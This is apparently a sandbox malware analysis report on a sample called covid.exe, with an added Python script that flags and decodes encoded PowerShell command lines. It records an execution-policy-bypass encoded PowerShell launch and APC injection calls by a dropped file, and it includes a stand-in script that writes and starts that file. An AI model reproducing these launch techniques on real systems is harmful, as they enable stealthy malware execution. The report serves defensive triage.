Analysis Report covid.exe

Overview

General Information

Sample Name: covid.exe
Analysis ID: 379751
MD5: a990c03d14bef241e880d6167fa5a6aa
SHA1: 210c7bed3182e3113b9a20816ced2f9c2ad6f86a
SHA256: 9d0cc73772d79a0561d03db4e6aca9fad9b125afbbc7f2b4f7f3df25eeed56a0

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Early bird code injection technique detected
Malicious encrypted Powershell command line found
Multi AV Scanner detection for submitted file
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Encoded PowerShell Command Line
Uses cmd line tools excessively to alter registry or file data
Writes to foreign memory regions
Yara detected Powershell Load Encrypted Assembly
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: covid.exe Avira: detected
Multi AV Scanner detection for submitted file
Source: covid.exe Virustotal: Detection: 15%
Source: covid.exe ReversingLabs: Detection: 34%
Antivirus or Machine Learning detection for unpacked file
Source: 0.0.covid.exe.c70000.0.unpack Avira: Label: TR/Dropper.Gen2

Compliance:

Uses 32bit PE files
Source: covid.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 23.111.9.35:443 -> 192.168.2.3:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.111.9.35:443 -> 192.168.2.3:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.136.157:443 -> 192.168.2.3:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.136.157:443 -> 192.168.2.3:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.2:443 -> 192.168.2.3:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.2:443 -> 192.168.2.3:49734 version: TLS 1.2
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: covid.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF68605D1B8 FindFirstFileExW, 13_2_00007FF68605D1B8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE11D1B8 FindFirstFileExW, 18_2_00007FF6FE11D1B8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D7D1B8 FindFirstFileExW, 29_2_00007FF7E3D7D1B8

Networking:

Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000001.00000002.281304560.000001A414536000.00000004.00000001.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery8Q
Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateDatarame
Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery
Note: the strings matched for this signature are the http://schemas.microsoft.com/cmdlets-over-objects/2009/11 XML namespace that PowerShell's CDXML-based (CIM cmdlet) modules hold in memory. They are schema identifiers, not download locations, and should not be treated as dropper URLs for this sample.
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 23.111.9.35 23.111.9.35
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: base[1].js.7.dr String found in binary or memory: "s.youtube.com"===t&&(t=OD(this.va)||"www.youtube.com")):t="video.google.com";this.Qj=t;PD(this,a,!0);this.L=new XC;g.H(this,this.L);t=b?b.innertubeApiKey:tD("",a.innertube_api_key);r=b?b.innertubeApiVersion:tD("",a.innertube_api_version);p=b?b.innertubeContextClientVersion:tD("",a.innertube_context_client_version);this.Mf={innertubeApiKey:uo("INNERTUBE_API_KEY")||t,innertubeApiVersion:uo("INNERTUBE_API_VERSION")||r,cH:g.M("INNERTUBE_CONTEXT_CLIENT_CONFIG_INFO"),dH:this.deviceParams.c,innertubeContextClientVersion:uo("INNERTUBE_CONTEXT_CLIENT_VERSION")|| equals www.youtube.com (Youtube)
Source: base[1].js.7.dr String found in binary or memory: (g.Km(b,"www.youtube.com"),c=b.toString()):c=mw(c);b=new Dy(c);b.set("cmo=pf","1");d&&b.set("cmo=td","a1.googlevideo.com");return b}; equals www.youtube.com (Youtube)
Source: FL794448.htm.7.dr String found in binary or memory: <iframe width="560" height="315" src="https://www.youtube.com/embed/yEIPefMsf70" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen title="WHO: A global response to a global pandemic"></iframe> equals www.youtube.com (Youtube)
Source: base[1].js.7.dr String found in binary or memory: Mga=function(a,b){if(!a.i["0"]){var c=new lB("0","fakesb",void 0,new hB(0,0,0,void 0,void 0,"auto"),null,null,1);a.i["0"]=b?new tA(new Dy("http://www.youtube.com/videoplayback"),c,"fake"):new dB(new Dy("http://www.youtube.com/videoplayback"),c,new aA(0,0),new aA(0,0),0,NaN)}}; equals www.youtube.com (Youtube)
Source: base[1].js.7.dr String found in binary or memory: g.YD=function(a){a=OD(a.va);return"www.youtube-nocookie.com"===a?"www.youtube.com":a}; equals www.youtube.com (Youtube)
Source: base[1].js.7.dr String found in binary or memory: g.k.clone=function(){var a=new Om;a.u=this.u;this.i&&(a.i=this.i.clone(),a.l=this.l);return a};var Vm="://secure-...imrworldwide.com/ ://cdn.imrworldwide.com/ ://aksecure.imrworldwide.com/ ://[^.]*.moatads.com ://youtube[0-9]+.moatpixel.com ://pm.adsafeprotected.com/youtube ://pm.test-adsafeprotected.com/youtube ://e[0-9]+.yt.srs.doubleverify.com www.google.com/pagead/xsul www.youtube.com/pagead/slav".split(" "),vda=/\bocr\b/;var wda=/(?:\[|%5B)([a-zA-Z0-9_]+)(?:\]|%5D)/g;var UD={f_:"LIVING_ROOM_APP_MODE_UNSPECIFIED",c_:"LIVING_ROOM_APP_MODE_MAIN",b_:"LIVING_ROOM_APP_MODE_KIDS",d_:"LIVING_ROOM_APP_MODE_MUSIC",e_:"LIVING_ROOM_APP_MODE_UNPLUGGED",a_:"LIVING_ROOM_APP_MODE_GAMING"};Ym.prototype.set=function(a,b){b=void 0===b?!0:b;0<=a&&52>a&&0===a%1&&this.i[a]!=b&&(this.i[a]=b,this.l=-1)}; equals www.youtube.com (Youtube)
Source: base[1].js.7.dr String found in binary or memory: g.k.getVideoUrl=function(a,b,c,d,e){b={list:b};c&&(e?b.time_continue=c:b.t=c);c=g.ZD(this);d&&"www.youtube.com"===c?d="https://youtu.be/"+a:g.JD(this)?(d="https://"+c+"/fire",b.v=a):(d=this.protocol+"://"+c+"/watch",b.v=a,nq&&(a=Ap())&&(b.ebc=a));return g.Id(d,b)}; equals www.youtube.com (Youtube)
Source: base[1].js.7.dr String found in binary or memory: g.oE=function(a){var b=g.ZD(a);!a.ea("yt_embeds_disable_new_error_lozenge_url")&&kha.includes(b)&&(b="www.youtube.com");return a.protocol+"://"+b}; equals www.youtube.com (Youtube)
Source: base[1].js.7.dr String found in binary or memory: g.yM.prototype.l=function(a){var b=this;$na(this);var c=a.wA,d=this.api.T();"GENERIC_WITHOUT_LINK"!==c||d.I?"TOO_MANY_REQUESTS"===c?(d=this.api.getVideoData(),this.bd(BM(this,"TOO_MANY_REQUESTS_WITH_LINK",d.Vm(),void 0,void 0,void 0,!1))):"HTML5_NO_AVAILABLE_FORMATS_FALLBACK"!==c||d.I?this.bd(g.zM(a.errorMessage)):this.bd(BM(this,"HTML5_NO_AVAILABLE_FORMATS_FALLBACK_WITH_LINK_SHORT","//www.youtube.com/supported_browsers")):(a=d.hostLanguage,c="//support.google.com/youtube/?p=player_error1",a&&(c= equals www.youtube.com (Youtube)
Source: base[1].js.7.dr String found in binary or memory: gia(this.videoData),this.V("highrepfallback");else if(a.i){b=this.l?this.l.l.l:null;if(Rva(a)&&b&&b.isLocked())var d="FORMAT_UNAVAILABLE";else if(!this.i.I&&"auth"===a.errorCode&&"429"===a.details.rc){d="TOO_MANY_REQUESTS";var e="6"}this.V("playererror",a.errorCode,d,g.KB(a.details),e)}else d=/^pp/.test(this.videoData.clientPlaybackNonce),oU(this,a.errorCode,a.details),d&&"manifest.net.connect"===a.errorCode&&(a="https://www.youtube.com/generate_204?cpn="+this.videoData.clientPlaybackNonce+"&t="+ equals www.youtube.com (Youtube)
Source: base[1].js.7.dr String found in binary or memory: h,l,"Trusted Ad Domain URL");this.Da=U(!1,a.privembed);this.protocol=0===this.Gc.indexOf("http:")?"http":"https";this.va=hw((b?b.customBaseYoutubeUrl:a.BASE_YT_URL)||"")||hw(this.Gc)||this.protocol+"://www.youtube.com/";l=b?b.eventLabel:a.el;h="detailpage";"adunit"===l?h=this.l?"embedded":"detailpage":"embedded"===l||this.u?h=rD(h,l,hha):l&&(h="embedded");this.Ca=h;xp();l=null;h=b?b.playerStyle:a.ps;var m=g.fb(xD,h);!h||m&&!this.u||(l=h);this.playerStyle=l;this.J=(this.I=g.fb(xD,this.playerStyle))&& equals www.youtube.com (Youtube)
Source: base[1].js.7.dr String found in binary or memory: oJ.prototype.replace=function(a,b){a=g.q(a);for(var c=a.next();!c.done;c=a.next())delete this.i[c.value.encryptedTokenJarContents];kka(this,b)};pJ.prototype.Zo=function(a){var b,c,d=null===(b=a.responseContext)||void 0===b?void 0:b.locationPlayabilityToken;void 0!==d&&(this.locationPlayabilityToken=d,this.i=void 0,"TVHTML5"===(null===(c=a.responseContext)||void 0===c?void 0:c.clientName)?(this.localStorage=lka(this))&&this.localStorage.set("yt-location-playability-token",d,15552E3):g.Sq("YT_CL",JSON.stringify({t6:d}),15552E3,void 0,!0))};var sJ;g.v(rJ,Mr);rJ.prototype.ow=function(a,b){a=Mr.prototype.ow.call(this,a,b);return Object.assign(Object.assign({},a),this.i)};var Bka=/[&\?]action_proxy=1/,Aka=/[&\?]token=([\w-]*)/,Cka=/[&\?]video_id=([\w-]*)/,Dka=/[&\?]index=([\d-]*)/,Eka=/[&\?]m_pos_ms=([\d-]*)/,Hka=/[&\?]vvt=([\w-]*)/,vka="ca_type dt el flash u_tz u_his u_h u_w u_ah u_aw u_cd u_nplug u_nmime frm u_java bc bih biw brdim vis wgl".split(" "),Fka="www.youtube-nocookie.com youtube-nocookie.com www.youtube-nocookie.com:443 youtube.googleapis.com www.youtubeedu.com www.youtubeeducation.com video.google.com redirector.gvt1.com".split(" "),xka={android:"ANDROID", equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: www.who.int
Source: mobsync.exe, mobsync.exe, 00000014.00000002.340204624.0000023F81490000.00000040.00000001.sdmp String found in binary or memory: http://code.jquery.com/
Source: powershell.exe, 00000001.00000002.292130964.000001A42AF59000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: fa-regular-400[1].eot.7.dr String found in binary or memory: http://fontello.com
Source: fa-regular-400[1].eot.7.dr String found in binary or memory: http://fontello.comFont
Source: powershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.268280684.000001A4130EF000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: FL794448.htm.7.dr String found in binary or memory: http://schema.org
Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.265257231.000001A412EE1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: msapplication.xml.6.dr String found in binary or memory: http://www.amazon.com/
Source: powershell.exe, 00000001.00000002.268280684.000001A4130EF000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: FL794448.htm.7.dr String found in binary or memory: http://www.emro.who.int/index.html
Source: FL794448.htm.7.dr String found in binary or memory: http://www.euro.who.int/en/home
Source: msapplication.xml2.6.dr String found in binary or memory: http://www.live.com/
Source: msapplication.xml6.6.dr String found in binary or memory: http://www.wikipedia.com/
Source: base[1].js.7.dr String found in binary or memory: http://www.youtube.com/videoplayback
Source: base[1].js.7.dr String found in binary or memory: http://youtube.com/drm/2012/10/10
Source: base[1].js.7.dr String found in binary or memory: http://youtube.com/streaming/metadata/segment/102015
Source: base[1].js.7.dr String found in binary or memory: http://youtube.com/streaming/otf/durations/112015
Source: base[1].js.7.dr String found in binary or memory: http://youtube.com/yt/2012/10/10
Source: base[1].js.7.dr String found in binary or memory: https://admin.youtube.com
Source: analytics[1].js.7.dr String found in binary or memory: https://ampcid.google.com/v1/publisher:getClientId
Source: FL794448.htm.7.dr String found in binary or memory: https://app.powerbi.com/
Source: FL794448.htm.7.dr String found in binary or memory: https://cdn.who.int/media/images/default-source/who_homepage/thumbs_covid-map.tmb-479v.jpg
Source: FL794448.htm.7.dr String found in binary or memory: https://cdn.who.int/media/images/default-source/who_homepage/thumbs_interactive-timeline.tmb-479v.pn
Source: powershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: FL794448.htm.7.dr String found in binary or memory: https://covid19.who.int/
Source: base[1].js.7.dr String found in binary or memory: https://docs.google.com/get_video_info
Source: powershell.exe, 00000001.00000002.268280684.000001A4130EF000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: base[1].js.7.dr String found in binary or memory: https://pagead2.googlesyndication.com/pagead/osd.js
Source: FL794448.htm.7.dr String found in binary or memory: https://platform.twitter.com/widgets.js
Source: base[1].js.7.dr String found in binary or memory: https://redux.js.org/api/store#subscribelistener
Source: FL794448.htm.7.dr String found in binary or memory: https://s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5803f964fe6c9599
Source: FL794448.htm.7.dr String found in binary or memory: https://schema.org
Source: analytics[1].js.7.dr String found in binary or memory: https://stats.g.doubleclick.net/j/collect
Source: base[1].js.7.dr String found in binary or memory: https://support.google.com/youtube/?p=missing_quality
Source: base[1].js.7.dr String found in binary or memory: https://support.google.com/youtube/?p=noaudio
Source: base[1].js.7.dr String found in binary or memory: https://support.google.com/youtube/?p=report_playback
Source: base[1].js.7.dr String found in binary or memory: https://support.google.com/youtube/answer/6276924
Source: analytics[1].js.7.dr String found in binary or memory: https://tagassistant.google.com/
Source: base[1].js.7.dr String found in binary or memory: https://viacon.corp.google.com
Source: FL794448.htm.7.dr String found in binary or memory: https://www.afro.who.int/
Source: analytics[1].js.7.dr String found in binary or memory: https://www.google-analytics.com/debug/bootstrap
Source: analytics[1].js.7.dr String found in binary or memory: https://www.google-analytics.com/gtm/js?id=
Source: analytics[1].js.7.dr String found in binary or memory: https://www.google.%/ads/ga-audiences
Source: base[1].js.7.dr String found in binary or memory: https://www.googleapis.com/certificateprovisioning/v1/devicecertificates/create?key=AIzaSyB-5OLKTx2i
Source: analytics[1].js.7.dr String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
Source: FL794448.htm.7.dr String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: FL794448.htm.7.dr String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-5QFSQRT
Source: FL794448.htm.7.dr String found in binary or memory: https://www.paho.org/hq/index.php?lang=en
Source: powershell.exe, 00000001.00000003.262923135.000001A42AFB3000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.268280684.000001A4130EF000.00000004.00000001.sdmp, FL794448.htm.7.dr String found in binary or memory: https://www.who.int
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/ResourcePackages/WHO/assets/dist/images/logos/en/h-logo-blue.svg
Source: powershell.exe, 00000001.00000002.293621546.000001A42B1B0000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.293726435.000001A42B226000.00000004.00000001.sdmp String found in binary or memory: https://www.who.int/T
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/about/governance/world-health-assembly/seventy-third-world-health-assembly
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/about/what-we-do/who-brochure
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/about/who-we-are/privacy-policy
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/ar/home
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/campaigns/
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/campaigns/connecting-the-world-to-combat-coronavirus/how-to-report-misinformatio
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/emergencies/crises/cod/en/
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/emergencies/diseases/novel-coronavirus-2019
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/emergencies/diseases/novel-coronavirus-2019/interactive-timeline
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/es/home
Source: powershell.exe, 00000001.00000002.293726435.000001A42B226000.00000004.00000001.sdmp String found in binary or memory: https://www.who.int/f
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/fr/home
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/home
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/home/search?indexCatalogue=genericsearchindex1&wordsMode=AnyWord&searchQuery=
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/ictrp/search/en/
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/images/default-source/infographics/logo-who.tmb-1200v.jpg?Culture=en&amp;sfvrsn=
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/news-room/events
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/news-room/releases
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/news/item#:ItemDefaultUrl
Source: powershell.exe, 00000001.00000002.293726435.000001A42B226000.00000004.00000001.sdmp String found in binary or memory: https://www.who.int/nt/
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/pt/home
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/publications/en/
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/redirect-pages/mega-menu/data/announcement/world-health-statistics-2020
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/redirect-pages/mega-menu/emergencies/emergencies/democratic-republic-of-the-cong
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/redirect-pages/mega-menu/emergencies/public-health-emergency--dashboard
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/redirect-pages/page/novel-coronavirus-(covid-19)-situation-dashboard
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/ru/home
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/southeastasia
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/westernpacific/
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/zh/home
Source: FL794448.htm.7.dr String found in binary or memory: https://www.youtube.com/embed/yEIPefMsf70
Source: base[1].js.7.dr String found in binary or memory: https://www.youtube.com/generate_204?cpn=
Source: base[1].js.7.dr String found in binary or memory: https://youtu.be/
Source: base[1].js.7.dr String found in binary or memory: https://youtube.com/api/drm/fps?ek=uninitialized
Source: base[1].js.7.dr String found in binary or memory: https://youtubei.googleapis.com/youtubei/
Source: base[1].js.7.dr String found in binary or memory: https://yurt.corp.google.com
Note: the *.6.dr and *.7.dr sources above (FL794448.htm, base[1].js, analytics[1].js, fa-regular-400[1].eot, msapplication.xml*) are cache and configuration files written by Internet Explorer during the run, in which the WHO home page was loaded (see the www.who.int DNS query and the FL794448.htm content). The WHO, YouTube and Google URLs they contain describe that web content, not infrastructure belonging to the sample.
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown HTTPS traffic detected: 23.111.9.35:443 -> 192.168.2.3:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.111.9.35:443 -> 192.168.2.3:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.136.157:443 -> 192.168.2.3:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.136.157:443 -> 192.168.2.3:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.2:443 -> 192.168.2.3:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.2:443 -> 192.168.2.3:49734 version: TLS 1.2

E-Banking Fraud:

Malicious encrypted Powershell command line found
Source: C:\Users\user\Desktop\covid.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand [base64 payload not reproduced in this copy of the report]
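The command line above carries the three switches the "Suspicious Encoded PowerShell Command Line" Sigma rule keys on: -noprofile, -executionpolicy bypass and -encodedcommand. A triage script should both flag that combination and recover the script, because -encodedcommand takes base64 of the UTF-16LE script text and powershell.exe accepts any unambiguous prefix of a switch name (-e, -ec and -enc all mean -EncodedCommand). The following Python is an added example written for this page, not part of the sandbox report or the sample; the encoded payload is redacted in the report, so the script it decodes is a constructed stand-in that only mirrors the observed behaviour (a PE written to %APPDATA% as buyonegetone.exe), and the benign command line is likewise constructed.

```python
import base64
import re

# Minimum prefix length powershell.exe needs to resolve each switch; prefixes of
# "encodedcommand" win over "executionpolicy" for the single letter "e", as in powershell.exe.
SWITCHES = {
    "encodedcommand": 1,
    "executionpolicy": 2,
    "noprofile": 3,
    "noninteractive": 4,
    "windowstyle": 1,
    "sta": 3,
}

_TOKEN = re.compile(r'"[^"]*"|\'[^\']*\'|\S+')


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted runs together."""
    return [t.strip('"\'') for t in _TOKEN.findall(cmdline)]


def _switch(token):
    """Map a token such as '-enc' or '/ep' to its full switch name, or None for non-switches."""
    if not token or token[0] not in "-/":
        return None
    t = token[1:].lower()
    for full, min_len in SWITCHES.items():
        if len(t) >= min_len and full.startswith(t):
            return full
    return None


def triage_powershell_cmdline(cmdline):
    """Return the switches seen, the decoded -EncodedCommand script (if any) and a verdict."""
    tokens = tokenize(cmdline)
    found = {}
    decoded = None
    i = 0
    while i < len(tokens):
        name = _switch(tokens[i])
        value = tokens[i + 1] if i + 1 < len(tokens) else None
        if name == "encodedcommand" and value is not None:
            try:
                # PowerShell encodes the script as UTF-16LE before base64-encoding it.
                decoded = base64.b64decode(value, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                decoded = None
            found[name] = value
            i += 2
        elif name in ("executionpolicy", "windowstyle") and value is not None:
            found[name] = value.lower()
            i += 2
        elif name:
            found[name] = True
            i += 1
        else:
            i += 1
    # Encoded command plus a policy bypass, profile suppression or hidden window: the
    # combination the Sigma rule in the report flags.
    suspicious = bool(
        "encodedcommand" in found
        and (
            found.get("executionpolicy") == "bypass"
            or found.get("noprofile")
            or str(found.get("windowstyle", "")).startswith("h")
        )
    )
    return {"switches": found, "decoded": decoded, "suspicious": suspicious}


# Constructed stand-in for the payload that is redacted in this copy of the report.
SAMPLE_SCRIPT = ('[IO.File]::WriteAllBytes("$env:APPDATA\\buyonegetone.exe", $bytes); '
                 'Start-Process "$env:APPDATA\\buyonegetone.exe"')
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_CMDLINE = (
    "'C:\\Windows\\system32\\windowspowershell\\v1.0\\powershell.exe' "
    "-sta -noprofile -executionpolicy bypass -encodedcommand " + SAMPLE_B64
)
# Constructed benign line: no encoded payload, so it must not trip the rule.
BENIGN_CMDLINE = "powershell.exe -NoProfile -Command Get-Date"

if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE, BENIGN_CMDLINE):
        result = triage_powershell_cmdline(line)
        print(result["suspicious"], sorted(result["switches"]), result["decoded"])
```

Run over process-creation telemetry (Sysmon event 1, Windows 4688 with command-line auditing), the decoded text is what you pivot on next: here it would name the dropped file that the "Powershell drops PE file" signature reports.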

System Summary:

Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\buyonegetone.exe
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF68604761C NtQueueApcThread, 13_2_00007FF68604761C
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF6860473EC NtResumeThread, 13_2_00007FF6860473EC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686047494 NtAllocateVirtualMemory, 13_2_00007FF686047494
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686047478 NtWriteVirtualMemory, 13_2_00007FF686047478
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE10761C NtQueueApcThread, 18_2_00007FF6FE10761C
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE1073EC NtResumeThread, 18_2_00007FF6FE1073EC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE107494 NtAllocateVirtualMemory, 18_2_00007FF6FE107494
